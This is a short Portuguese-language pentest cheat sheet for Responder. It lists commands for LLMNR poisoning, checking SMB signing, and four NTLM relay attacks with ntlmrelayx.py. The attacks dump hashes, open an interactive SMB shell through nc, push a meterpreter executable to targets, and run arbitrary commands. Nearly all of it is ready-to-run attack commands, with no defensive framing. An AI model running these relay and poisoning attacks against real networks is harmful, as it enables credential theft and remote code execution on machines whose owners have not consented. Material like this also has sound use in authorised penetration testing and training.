# Responder

#### Responder

* Envenenamento por LMNR

```bash
responder -I eth0 -A -v
```

* Relé SMB

```bash
nmap --script=smb2-security-mode -p445
```

* Ataques de resposta
  * http off smb off em responder.conf
* Ataque 1

```bash
responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support
```

* Ataque 2

```bash
responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support -i # It will show SMB shell opned on port {PORT}
nc 127.0.0.1 {PORT}
```

> Comando SHELL `shares` para obter o nome das ações e `use SHARENAME$` para obter acesso.

* Ataque 3

```bash
responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support -e meterpreterShell.exe
```

* Ataque 4

```bash
responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
```